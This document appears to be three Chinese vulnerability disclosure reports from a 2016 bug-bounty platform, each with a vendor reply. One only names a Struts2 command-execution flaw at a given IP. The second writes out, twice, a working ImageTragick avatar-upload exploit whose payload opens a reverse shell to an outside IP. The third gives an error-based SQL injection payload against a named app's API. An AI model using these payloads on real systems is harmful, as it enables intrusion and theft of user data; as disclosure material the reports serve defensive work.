漏洞详情披露状态： 2016-05-03： 细节已通知厂商并且等待厂商处理中2016-05-09： 厂商已经确认，细节仅向厂商公开2016-05-19： 细节向核心白帽子及相关领域专家公开2016-05-29： 细节向普通白帽子公开2016-06-08： 细节向实习白帽子公开2016-06-23： 细节向公众公开简要描述： 详细说明：http://219.133.73.185:81/admin/login.do中海油船舶代理信息管理系统存在st2命令执行漏洞，可getshell只截图证明危害漏洞利用截图如下： 漏洞证明：  修复方案： 版权声明：转载请注明来源 工程院士@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：2确认时间：2016-05-09 08:31厂商回复：感谢工程院士，我们会尽快修复最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述： 详细说明：app头像上传处传一张图抓包把图片的内容改为push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'pop graphic-contextcode 区域POST /rest/n/user/modify?lat=20.043384&lon=110.410347&ver=4.44&ud=234221710&sys=ANDROID_4.2.2&c=360APP&oc=360APP&net=WIFI&did=ANDROID_1072044643045168&mod=samsung%28GT-P5210%29&app=0&language=zh-cn&country_code=CN&appver=4.44.0.1323 HTTP/1.1 Accept-Language: zh-cn User-Agent: kwai-android Content-Type: multipart/form-data; boundary=8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Host: 180.186.38.200 Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 1159 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="token" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 9818721fb5db40cc9d5015e8d5d0f8d0-234221710 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="os" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit android --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="sig" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 9357092294a29fb6be75ec7884fb44d6 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="client_key" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 3c2cd3f3 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="file"; filename="avatar-1462541373042.png" Content-Type: image/png; charset=UTF-8 Content-Transfer-Encoding: binary push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")' pop graphic-context --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK--发包后在服务器上监听12345端口 漏洞证明：app头像上传处传一张图抓包把图片的内容改为push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'pop graphic-contextcode 区域POST /rest/n/user/modify?lat=20.043384&lon=110.410347&ver=4.44&ud=234221710&sys=ANDROID_4.2.2&c=360APP&oc=360APP&net=WIFI&did=ANDROID_1072044643045168&mod=samsung%28GT-P5210%29&app=0&language=zh-cn&country_code=CN&appver=4.44.0.1323 HTTP/1.1 Accept-Language: zh-cn User-Agent: kwai-android Content-Type: multipart/form-data; boundary=8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Host: 180.186.38.200 Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 1159 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="token" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 9818721fb5db40cc9d5015e8d5d0f8d0-234221710 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="os" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit android --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="sig" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 9357092294a29fb6be75ec7884fb44d6 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="client_key" Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 3c2cd3f3 --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK Content-Disposition: form-data; name="file"; filename="avatar-1462541373042.png" Content-Type: image/png; charset=UTF-8 Content-Transfer-Encoding: binary push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")' pop graphic-context --8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK--发包后在服务器上监听12345端口 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-06 23:41厂商回复：还有缺漏没有完全修复，非常感谢最新状态：暂无

漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：APP安全之SQL注入详细说明：目标：273二手车IOS APP检测发现以下地方存在SQL注入：（POST中的push_type，报错注入）code 区域POST https://appserv.273.cn/1.3/subscribe.updateClientId/?_api_time=1461545212.897876&_api_key=8a7f95774b1ce149fda1025298c310d9&_api_token=5UyTSYg9rhZy%2FkyyJPJTXhD88e9whsqPx9CobSuqNsAk0gaSp3Q7CyQgcq0NVYX6&_api_debug=1&_app_source=2&_app_type=2&_app_version=3.2.2 HTTP/1.1 Host: appserv.273.cn Content-Type: application/x-www-form-urlencoded Connection: keep-alive Proxy-Connection: keep-alive Accept: */* User-Agent: MainWebsite/3.2.2 (iPhone; iOS 9.3.1; Scale/2.00) Accept-Language: zh-Hans;q=1 Accept-Encoding: gzip, deflate Content-Length: 131 client_id=67BAE8C5-75A5-40F1-B8A7-6752478C62AD&push_id=db7da0fa6c938ef57ad343e76aeaf9b445efbac4a600e0c71dd9aa281d95f68a&push_type=1Payload：code 区域push_type=1 AND (SELECT 5743 FROM(SELECT COUNT(*),CONCAT(0x7177776d71,(SELECT (CASE WHEN (5743=5743) THEN 1 ELSE 0 END)),0x7169617a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- 漏洞证明：1、当前数据库用户2、所有数据库3、数据表，涉及60W+用户数据/170W+交易订单，具体就不深入了 修复方案：请多指教~版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-04-29 11:21厂商回复：谢谢，已经安排修复。后续发礼物。最新状态：暂无